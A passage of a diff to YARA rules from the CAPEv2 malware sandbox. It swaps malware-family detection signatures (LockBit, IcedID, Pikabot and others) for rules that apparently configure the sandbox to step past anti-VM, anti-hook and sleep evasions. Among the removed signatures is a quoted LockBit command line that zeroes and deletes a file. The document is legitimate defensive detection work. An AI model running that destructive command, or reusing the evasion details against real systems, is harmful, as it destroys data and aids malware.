+		cape_options = "coverage-modules=gdiplus,ntdll-protect=0"
+		packed = "51bb71bd446bd7fc03cc1234fcc3f489f10db44e312c9ce619b937fad6912656"
 
 	strings:
-		$code1 = {41 0F B6 00 4D 8D 40 01 34 01 8B D7 83 E2 07 0F BE C8 FF C7 41 0F BE 04 91 0F AF C1 41 88 40 FF 81 FF 80 03 00 00 7C D8}
+		$setpath = "setPath"
+		$alloc = {B8 01 00 00 00 48 6B C0 08 48 8D 0D [2] 00 00 48 03 C8 48 8B C1 48 89 [3] 00 00 00 8B 44 [2] 05 FF 0F 00 00 25 00 F0 FF FF 8B C0 48 89}
+		$hook = {48 85 C9 74 20 48 85 D2 74 1B 4C 8B C9 45 85 C0 74 13 48 2B D1 42 8A 04 0A 41 88 01 49 FF C1 41 83 E8 01 75 F0 48 8B C1 C3}
+		$algo = {41 8B C1 C1 E8 0B 0F AF C2 44 3B C0 73 6A 4C 8B [3] 44 8B C8 B8 00 08 00 00 2B C2 C1 E8 05 66 03 C2 8B 94 [2] 00 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of ( $code* )
+		2 of them
 }
-rule CAPE_Kpot : FILE
+rule CAPE_Emotetpacker : FILE
 {
 	meta:
-		description = "Kpot Stealer"
+		description = "Emotet bypass"
 		author = "kevoreilly"
-		id = "724fd6ac-e734-5952-b459-01cbaffdb89d"
-		date = "2020-10-19"
-		modified = "2020-10-19"
+		id = "67b8e14c-5fa8-52af-bb9a-1663b084fbf0"
+		date = "2022-06-09"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Kpot.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "75abaab9a10e8ac8808425c389238285ab9bd9cb76f0cd03cc1e35b3ea0a1b0f"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/EmotetPacker.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "5a95d1d87ce69881b58a0e3aafc1929861e2633cdd960021d7b23e2a36409e0d"
+		logic_hash = "5f27d9d18884f7e0805f69960869b332c1577bf8be8ac103285e8bf98cda0ffd"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Kpot Payload"
+		cape_options = "bp0=$trap1+31,action0=skip,bp1=$trap2+43,action1=jmp:186,count=1"
 
 	strings:
-		$format = "%s | %s | %s | %s | %s | %s | %s | %d | %s"
-		$username = "username:s:"
-		$os = "OS: %S x%d"
+		$trap1 = {8B 45 08 0F 28 0D [4] 0F 57 C0 0F 29 46 30 89 46 40 C7 46 44 00 00 00 00 0F 11 4E 48 E8}
+		$trap2 = {F2 0F 10 15 [4] BE 01 00 00 00 0F 01 F9 C7 44 24 60 00 00 00 00 89 4C 24 60 0F 01 F9 C7 44 24 5C 00 00 00 00 89 4C 24 5C 0F 1F 84 00 00 00 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		uint16( 0 ) == 0x5A4D and any of ( $trap* )
 }
-rule CAPE_Jaff : FILE
+rule CAPE_Heavenssyscall : FILE
 {
 	meta:
-		description = "Jaff Payload"
+		description = "Bypass variants of heaven's gate direct syscalls"
 		author = "kevoreilly"
-		id = "6681c1fe-6c88-5a49-bdfa-54ce08ea6707"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "7c60102a-ac8b-5e28-8dbb-4b6c3f4cddff"
+		date = "2024-03-25"
+		modified = "2024-03-25"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Jaff.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "6806a5eeee04b7436ff694addc334bfc0f1ee611116904d57be9506acfd47418"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/HeavensSyscall.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "aeb981fcba0936ff8b1be4c601445fd45e5d3b74856a9439d351edd57f5a50c3"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Jaff Payload"
+		cape_options = "clear,br0=$gate1-9,action1=seteax:0,count=0,sysbp=$sysenter+10"
+		packed = "2950b4131886e06bdb83ab1611b71273df23b0d31a4d8eb6baddd33327d87ffa"
 
 	strings:
-		$a1 = "CryptGenKey"
-		$a2 = "353260540318613681395633061841341670181307185694827316660016508"
-		$b1 = "jaff"
-		$b2 = "2~1c0q4t7"
+		$gate1 = {00 00 00 00 74 24 8D 45 F8 50 6A FF FF 95 [4] 85 C0 74 08 8B 4D F8 89 4D FC EB 07 C7 45 FC 00 00 00 00 8B 45 FC EB 02 33 C0 8B E5 5D C2 C0}
+		$sysenter = {68 [4] E8 [4] E8 [4] C2 ?? 00 CC CC CC CC CC CC CC CC}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( any of ( $a* ) ) and ( 1 of ( $b* ) )
+		uint16( 0 ) == 0x8B55 and all of them
 }
-rule CAPE_Gootkit : FILE
+rule CAPE_Gettickcountantivm
 {
 	meta:
-		description = "Gootkit Payload"
+		description = "GetTickCountAntiVM bypass"
 		author = "kevoreilly"
-		id = "8935fd10-ac79-5196-80c2-fc8f2fe185b5"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "d90b9768-0525-5963-9817-e3a53b1d4cf3"
+		date = "2022-02-25"
+		modified = "2022-02-25"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Gootkit.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "26704b6b0adca51933fc9d5e097930320768fd0e9355dcefc725aee7775316e7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/GetTickCountAntiVM.yar#L1-L20"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "662bc7839ed7ddd82d5fdafa29fafd9a9ec299c28820fe4104fbba9be1a09c42"
+		hash = "00f1537b13933762e1146e41f3bac668123fac7eacd0aa1f7be0aa37a91ef3ce"
+		hash = "549bca48d0bac94b6a1e6eb36647cd007fed5c0e75a0e4aa315ceabdafe46541"
+		hash = "90c29a66209be554dfbd2740f6a54d12616da35d0e5e4af97eb2376b9d053457"
+		logic_hash = "9cdb0b2d2e058e1858c2f2baad67005a2019fbbdcb7ca54571c8d20dfbf33471"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "Gootkit Payload"
+		tags = ""
+		cape_options = "bp0=$antivm1-13,bp0=$antivm5-40,bp0=$antivm6,action0=wret,hc0=1,bp1=$antivm2-6,action1=wret,hc1=1,count=1,bp2=$antivm3+42,action2=jmp:96,bp3=$antivm4-9,action3=wret,hc3=1"
 
 	strings:
-		$code1 = {C7 45 ?? ?? ?? 4? 00 C7 45 ?? ?? 10 40 00 C7 45 E? D8 ?? ?? 00 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 [1-2] 00 10 40 00 89 [5-6] 43 00 89 ?? ?? 68 E8 80 00 00 FF 15}
+		$antivm1 = {57 FF D6 FF D6 BF 01 00 00 00 FF D6 F2 0F 10 0D [4] 47 66 0F 6E C7 F3 0F E6 C0 66 0F 2F C8 73}
+		$antivm2 = {F2 0F 11 45 ?? FF 15 [4] 6A 00 68 10 27 00 00 52 50 E8 [4] 8B C8 E8 [4] F2 0F 59 45}
+		$antivm3 = {0F 57 C0 E8 [4] 8B 35 [4] BF 01 00 00 00 FF D6 F2 0F 10 0D [4] 47 66 0F 6E C7 F3 0F E6 C0 66 0F 2F C8 73}
+		$antivm4 = {F2 0F 11 45 EC FF 15 [4] 8B DA 8B C8 BA [4] 89 5D FC F7 E2 BF [4] 89 45 F4 8B F2 8B C1 B9}
+		$antivm5 = {BB 01 00 00 00 8B FB 90 FF 15 [4] FF C7 66 0F 6E C7 F3 0F E6 C0 66 0F 2F F8 73 EA}
+		$antivm6 = {48 81 EC 88 00 00 00 0F 57 C0 F2 0F 11 44 [2] F2 0F 10 05 [4] F2 0F 11 44 [2] F2 0F 10 05 [4] F2 0F 11}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		any of them
 }
-rule CAPE_Pikabotloader : FILE
+rule CAPE_Icedidsyscallwritemem : FILE
 {
 	meta:
-		description = "Pikabot Loader"
+		description = "IcedID 'syscall' packer bypass - direct write variant"
 		author = "kevoreilly"
-		id = "e2c89cdd-0cdb-5367-8aae-2fe685eff972"
-		date = "2024-03-13"
-		modified = "2024-03-13"
+		id = "67935058-4191-587f-ad19-497defd0eef1"
+		date = "2023-11-28"
+		modified = "2023-11-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/PikaBot.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "7e5f1f2911545ee6bd36b54f2627fbdec1b957f4b91df901dd1c6cbd4dff0231"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/IcedID.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "6b068106b038e9efeb9057cadf314d400c1ada1a1cc70336d3272da3a212c993"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "PikaBot Loader"
+		cape_options = "bp0=$tokencheck+9,action0=jmp,count=0"
+		packed = "28075ecae5e224c06e250f2c949c826b81844bca421e9158a7a9e965a29ef894"
+		packed = "045dff9f14a03225df55997cb2ca74ff60ecaf317b9e033ea93386785db84161"
 
 	strings:
-		$indirect = {31 C0 64 8B 0D C0 00 00 00 85 C9 74 01 40 50 8D 54 24 ?? E8 [4] A3 [4] 8B 25 [4] A1}
-		$sysenter1 = {89 44 24 08 8D 85 ?? FC FF FF C7 44 24 04 FF FF 1F 00 89 04 24 E8}
-		$sysenter2 = {C7 44 24 0C 00 00 00 02 C7 44 24 08 00 00 00 02 8B 45 0C 89 44 24 04 8B 45 08 89 04 24 E8}
+		$tokencheck = {39 5D ?? 75 06 83 7D ?? 03 74 05 BB 01 00 00 00 41 89 1C ?? 48 8B 4D ?? 41 FF D?}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Pikabot : FILE
+rule CAPE_Icedidhook
 {
 	meta:
-		description = "Pikabot Payload"
+		description = "IcedID hook fix"
 		author = "kevoreilly"
-		id = "140a3e20-9837-5f66-85dc-af278d75e074"
-		date = "2024-03-13"
-		modified = "2024-03-13"
+		id = "011c9cb7-8080-5f8a-9dca-6397e9bf7bf6"
+		date = "2023-11-28"
+		modified = "2023-11-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/PikaBot.yar#L15-L28"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "ed07217c373831a9a67d914854154988696e6fcea70dedabf333385f0e7bb8b7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/IcedID.yar#L15-L25"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "fd62e0ed6f2a18472fa9336daee0e8a3a55e21779a8385394e85f96da928e24f"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "PikaBot Payload"
-		packed = "89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9"
+		tags = ""
+		cape_options = "ntdll-protect=0"
 
 	strings:
-		$decode = {29 D1 01 4B ?? 8D 0C 10 89 4B ?? 85 F6 74 02 89 16}
-		$indirect = {31 C0 64 8B 0D C0 00 00 00 85 C9 74 01 40 50 8D 54 24 ?? E8 [4] A3 [4] 8B 25 [4] A1}
-		$config = {C7 44 24 [3] 00 00 C7 44 24 [4] 00 89 [1-4] ?? E8 [4] 31 C0 C7 44 24 [3] 00 00 89 44 24 ?? C7 04 24 [4] E8}
+		$hook = {C6 06 E9 83 E8 05 89 46 01 8D 45 ?? 50 FF 75 ?? 6A 05 56 6A FF E8 2D FA FF FF}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		any of them
 }
-rule CAPE_Pik23 : FILE
+rule CAPE_Icedidpackera : FILE
 {
 	meta:
-		description = "PikaBot Payload February 2023"
+		description = "IcedID export selection"
 		author = "kevoreilly"
-		id = "fc804c63-fc6c-5b26-92b1-aa5d2fbc4917"
-		date = "2024-03-13"
-		modified = "2024-03-13"
+		id = "d793d8a1-0e17-56ad-933c-470e2290867b"
+		date = "2023-11-28"
+		modified = "2023-11-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/PikaBot.yar#L30-L44"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "59f42ecde152f78731e54ea27e761bba748c9309a6ad1c2fd17f0e8b90f8aed1"
-		logic_hash = "71a71df2f2a075294941c54eed06cafaaa4d3294e45b3a0098c1cffddd0438bc"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/IcedID.yar#L27-L40"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe"
+		logic_hash = "aa0681e7794546355e6d61f739c49035a493cdfca7e666531d74e3835ec44408"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "PikaBot Payload"
+		cape_options = "export=$export"
 
 	strings:
-		$rdtsc = {89 55 FC 89 45 F8 0F 31 89 55 F4 89 45 FC 33 C0 B8 05 00 00 00 C1 E8 02 2B C3 3B C1 0F 31 89 55 F0 89 45 F8 8B 44 8D}
-		$int2d = {B8 00 00 00 00 CD 2D 90 C3 CC CC CC CC CC CC CC}
-		$subsys = {64 A1 30 00 00 00 8B 40 18 C3}
-		$rijndael = {EB 0F 0F B6 04 3? FE C? 8A 80 [4] 88 04 3? 0F B6 [3] 7C EA 5? 5? C9 C3}
+		$init = "init"
+		$export = {48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 81 EC [2] 00 00 41 8B E9 49 8B F0 48 8B FA 48 8B D9}
+		$alloc = {8B 50 50 33 C9 44 8D 49 40 41 B8 00 30 00 00 FF 15 [4] 48 89 44 24 28 [0-3] 48 89 84 24 ?? 00 00 00 E9}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Lockbit : FILE
+rule CAPE_Icedidpackerb : FILE
 {
 	meta:
-		description = "Lockbit Payload"
+		description = "IcedID export selection"
 		author = "kevoreilly"
-		id = "ec9b4fec-0233-5277-b922-07057c2b4b34"
-		date = "2022-06-09"
-		modified = "2022-06-09"
+		id = "6bd0e64d-e60e-5cd2-af79-946a7f6dc9f5"
+		date = "2023-11-28"
+		modified = "2023-11-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Lockbit.yar#L1-L15"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "80ab705c8246a0bd5b3de65146cf32b102f39bf9444bdf1d366b5a794c1229b9"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/IcedID.yar#L42-L56"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "6517ef2c579002ec62ddeb01a3175917c75d79ceca355c415a4462922c715cb6"
+		logic_hash = "fde1e2c0124d180b2fa3d0675b35e8d78fdd7b06cd27e9228c148aa29ce30ee7"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Lockbit Payload"
+		cape_options = "export=$export"
 
 	strings:
-		$string1 = "/C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 \"%s\" & Del /f /q \"%s\"" wide
-		$string2 = "Ransom" ascii wide
-		$crypto = {8B 4D 08 C1 E9 10 0F B6 D1 8B 4D 0C C1 E9 08 0F B6 C9 8B 14 95 [4] 8B 7D FC 33 14 8D [4] 8B CF C1 E9 18 33 14 8D [4] 0F B6 CB 33 14 8D [4] 8B CF 33 10}
-		$decode1 = {8A ?4 34 ?C 0? 00 00 8B 8? 24 ?8 0? 00 00 0F BE ?? 0F BE C? 33 ?? 88 ?? 34 ?? 0? 00 00 46 83 FE 0? 72 DD}
-		$decode2 = {8A 44 24 ?? 30 44 0C ?? 41 83 F9 ?? 72 F2}
+		$init = "init"
+		$export = {44 89 4C 24 20 4C 89 44 24 18 48 89 4C 24 08 41 55 41 56 41 57 48 81 EC ?? 00 00 00 B9 [2] 00 00 4C 8B EA E8}
+		$loop = {8B C2 48 8D 49 01 83 E0 07 FF C2 0F B6 44 30 ?? 30 41 FF 3B D5 72}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 2 of them )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Cryptoshield : FILE
+rule CAPE_Icedidpackerc : FILE
 {
 	meta:
-		description = "Cryptoshield Payload"
+		description = "IcedID export selection"
 		author = "kevoreilly"
-		id = "a7b60a0d-7d46-59c9-8273-ee23bae3fbbc"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		id = "fddfd0d2-1bc0-56bb-b983-5850e17a3d0f"
+		date = "2023-11-28"
+		modified = "2023-11-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Cryptoshield.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "46064b4c69cb1af01330c5d194ef50728e0f0479e9fbf72828822935f8e37ac6"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/IcedID.yar#L58-L71"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "c06805b6efd482c1a671ec60c1469e47772c8937ec0496f74e987276fa9020a5"
+		hash = "265c1857ac7c20432f36e3967511f1be0b84b1c52e4867889e367c0b5828a844"
+		logic_hash = "f1e75e380ab0947fdfda012b7a5077a1c2ef51163239846ab2dc29cac95ba166"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Cryptoshield Payload"
+		cape_options = "export=$export"
 
 	strings:
-		$a1 = "CRYPTOSHIELD." wide
-		$a2 = "Click on Yes in the next window for restore work explorer" wide
-		$a3 = "r_sp@india.com - SUPPORT"
+		$export = {44 89 4C 24 20 4C 89 44 24 18 48 89 54 24 10 3A ED 74}
+		$alloc = {41 B8 00 10 00 00 8B D0 33 C9 66 3B ?? (74|0F 84)}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Obfuscar : FILE
+rule CAPE_Icedidpackerd : FILE
 {
 	meta:
-		description = "Obfuscar xor routime"
+		description = "IcedID export selection"
 		author = "kevoreilly"
-		id = "81eeb62f-578f-5c75-bc96-091d5727a20a"
-		date = "2025-03-07"
-		modified = "2025-03-07"
+		id = "df0ca4bd-1ea6-57ef-b85a-7ed0e2a20831"
+		date = "2023-11-28"
+		modified = "2023-11-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Obfuscar.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "54581e83e5fa13fae4bda74016b3fa1d18c92e2659f493ebe54d70fd5f77bba5"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/IcedID.yar#L73-L86"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "7b226f8cc05fa7d846c52eb0ec386ab37f9bae04372372509daa6bacc9f885d8"
+		logic_hash = "6685e0246f5a11ce0ca33447837de06506b447a5f8591423e2b76f2ab0274dc7"
 		score = 75
 		quality = 70
 		tags = "FILE"
+		cape_options = "export=$export"
 
 	strings:
-		$decode = {06 91 06 61 20 [4] 61 D2 9C 06 17 58 0A 06 7E [4] 8E 69 FE 04 2D ?? 2A}
+		$init = "init"
+		$export = {44 89 4C 24 20 4C 89 44 24 18 48 89 54 24 10 66 3B ED 74}
+		$load = {41 B8 00 80 00 00 33 D2 48 8B 4C [2] EB ?? B9 69 04 00 00 E8 [4] 48 89 84 [2] 00 00 00 66 3B ED 74}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Icedid
+rule CAPE_Icedsleep : FILE
 {
 	meta:
-		description = "IcedID Payload"
-		author = "kevoreilly, threathive"
-		id = "439342be-a1e6-5656-8813-5cebb0e88e98"
-		date = "2021-12-16"
-		modified = "2021-12-16"
+		description = "IcedID sleep bypass"
+		author = "kevoreilly"
+		id = "d6bd708b-47bc-5620-b40e-8fe5f1a67ba4"
+		date = "2023-11-28"
+		modified = "2023-11-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/IcedID.yar#L1-L18"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "e60ccbab7a360020744eba65961156ca3e2ae9cf23671014f913d71c1a96a331"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/IcedID.yar#L88-L99"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "0b1a8be95b1b8a3b066837f9e47561ee8202d741b39d64e626c0461c2fbf7c70"
 		score = 75
-		quality = 45
-		tags = ""
-		cape_type = "IcedID Payload"
+		quality = 70
+		tags = "FILE"
+		cape_options = "force-sleepskip=1"
+		packed = "e99f3517a36a9f7a55335699cfb4d84d08b042d47146119156f7f3bab580b4d7"
 
 	strings:
-		$crypt1 = {8A 04 ?? D1 C? F7 D? D1 C? 81 E? 20 01 00 00 D1 C? F7 D? 81 E? 01 91 00 00 32 C? 88}
-		$crypt2 = {8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3}
-		$crypt3 = {41 00 8B C8 C1 E1 08 0F B6 C4 66 33 C8 66 89 4? 24 A1 ?? ?? 41 00 89 4? 20 A0 ?? ?? 41 00 D0 E8 32 4? 32}
-		$download1 = {8D 44 24 40 50 8D 84 24 44 03 00 00 68 04 21 40 00 50 FF D5 8D 84 24 4C 01 00 00 C7 44 24 28 01 00 00 00 89 44 24 1C 8D 4C 24 1C 8D 84 24 4C 03 00 00 83 C4 0C 89 44 24 14 8B D3 B8 BB 01 00 00 66 89 44 24 18 57}
-		$download2 = {8B 75 ?? 8D 4D ?? 8B 7D ?? 8B D6 57 89 1E 89 1F E8 [4] 59 3D C8 00 00 00 75 05 33 C0 40 EB}
-		$major_ver = {0F B6 05 ?? ?? ?? ?? 6A ?? 6A 72 FF 75 0C 6A 70 50 FF 35 ?? ?? ?? ?? 8D 45 80 FF 35 ?? ?? ?? ?? 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 ?? ?? ?? ?? 83 C4 38 8B E5 5D C3}
-		$stage_2_request_binary = "id="
-		$stage_2_request_img = ".png"
+		$sleep = {89 4C 24 08 48 83 EC 38 8B 44 24 40 48 69 C0 10 27 00 00 48 F7 D8 48 89 44 24 20 48 8D 54 24 20 33 C9 FF 15 [4] 48 83 C4 38 C3}
 
 	condition:
-		any of ( $crypt* , $download* , $major_ver ) and all of ( $stage_2_request_* )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Seduploader : FILE
+rule CAPE_Vbcrypter
 {
 	meta:
-		description = "Seduploader decrypt function"
+		description = "VBCrypter anti-hook Bypass"
 		author = "kevoreilly"
-		id = "a7152d8c-a197-5784-8a6d-453d41585df1"
-		date = "2022-06-09"
-		modified = "2022-06-09"
+		id = "2e010dfd-5096-5e81-af9b-174322a47d87"
+		date = "2021-03-28"
+		modified = "2021-03-28"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Seduploader.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "d70c886699169d4dafc5b063c93682a34af5667df6d293b52256ddc19ab9c516"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/VBCrypter.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "a62bca62ab624ab1a2c2e612c5b7e6d543006026a49c07c46800499e31e41c4e"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "Seduploader Payload"
+		tags = ""
+		cape_options = "bp0=$antihook-12,action0=jmp,count=0"
 
 	strings:
-		$decrypt1 = {8D 0C 30 C7 45 FC 0A 00 00 00 33 D2 F7 75 FC 8A 82 ?? ?? ?? ?? 32 04 0F 88 01 8B 45 0C 40 89 45 0C 3B C3 7C DB}
+		$antihook = {43 39 C3 0F 84 ?? 00 00 00 80 3B B8 75 ?? 83 7B 01 00 75 ?? 80 7B 05 BA 75 ?? 8B 53 06 83 C3 0A 31 C9}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of ( $decrypt* )
+		any of them
 }
-rule CAPE_Oyster
+rule CAPE_Singlestepantihook
 {
 	meta:
-		description = "Oyster Payload"
-		author = "enzok"
-		id = "29443d00-e3de-53fd-b617-df470a30e805"
-		date = "2024-05-30"
-		modified = "2024-05-30"
+		description = "Single-step anti-hook Bypass"
+		author = "kevoreilly"
+		id = "f7aca40b-d231-543b-81f3-5f4524abab78"
+		date = "2021-08-26"
+		modified = "2021-08-26"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Oyster.yar#L1-L19"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "8bae0fa9f589cd434a689eebd7a1fde949cc09e6a65e1b56bb620998246a1650"
-		logic_hash = "23ab1518712dbce8319b87785d7ffc0c2b61de82c2bbf533ebf0aae39ec33540"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/SingleStepAntiHook.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "fc9f36b0ecc13192fe8b6caaff256ac52c1f14480223d629a38ba84e90dd0809"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_type = "Oyster Payload"
+		cape_options = "bp0=$antihook+6,action0=skip,count=0"
 
 	strings:
-		$start_exit = {(05 | 00) 00 00 00 2E 96 1E A6}
